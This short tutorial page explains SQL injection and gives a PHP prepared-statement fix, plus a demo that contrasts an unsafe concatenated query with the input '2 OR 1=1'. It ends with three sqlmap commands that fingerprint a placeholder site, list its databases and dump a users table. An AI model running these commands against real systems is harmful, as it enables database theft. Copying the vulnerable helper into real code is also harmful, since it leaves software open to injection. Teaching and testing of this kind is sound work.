SQL Injection & SQLmap Mastery

What is SQL Injection (SQLi)?

SQL Injection is a vulnerability where an application places user input into a database query without keeping it separate from the SQL code. By injecting malicious SQL, an attacker can manipulate the query's structure to bypass authentication or extract sensitive data.

Solutions & Prevention

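// Secure PHP Example
// $pdo is an existing PDO connection; $id is the untrusted request value.
// The query text is fixed and $id is bound as data, so it cannot change the query's structure.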
$stmt = $pdo->prepare('SELECT * FROM users WHERE id = ?');
$stmt->execute([$id]);
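
The contrast between a concatenated query and the prepared statement above, as an added example that is not part of the original page. The in-memory SQLite database, the sample rows, and the function names find_user_unsafe and find_user_safe are assumptions made for illustration.

```php
<?php
// Added example with constructed data: an in-memory SQLite database
// stands in for the application's real database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO users (name) VALUES ('alice'), ('bob'), ('carol')");

// Vulnerable (hypothetical helper): the id value becomes part of the SQL text,
// so anything in it is parsed as SQL.
function find_user_unsafe(PDO $pdo, string $id): array
{
    $sql = 'SELECT * FROM users WHERE id = ' . $id;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened (hypothetical helper): reject non-numeric ids, then bind the value
// as a parameter so the query text never changes.
function find_user_safe(PDO $pdo, string $id): array
{
    if (!ctype_digit($id)) {
        return [];
    }
    $stmt = $pdo->prepare('SELECT * FROM users WHERE id = ?');
    $stmt->execute([(int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal id, and a value that alters the WHERE clause
// when it is concatenated into the query.
$inputs = ['2', '2 OR 1=1'];

foreach ($inputs as $id) {
    printf(
        "id=%-10s unsafe=%d row(s)  safe=%d row(s)\n",
        $id,
        count(find_user_unsafe($pdo, $id)),
        count(find_user_safe($pdo, $id))
    );
}
```

With the second input, the concatenated query returns every row in the table, while the bound version returns none because the value is treated as data and fails the numeric check.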

Step 1: Identification & Fingerprinting

sqlmap -u "http://target-site.com/view.php?id=10" --batch --banner

Step 2: Database Enumeration

sqlmap -u "http://target-site.com/view.php?id=10" --dbs --batch

Step 3: Data Extraction

sqlmap -u "http://target-site.com/view.php?id=10" -D app -T users --dump --batch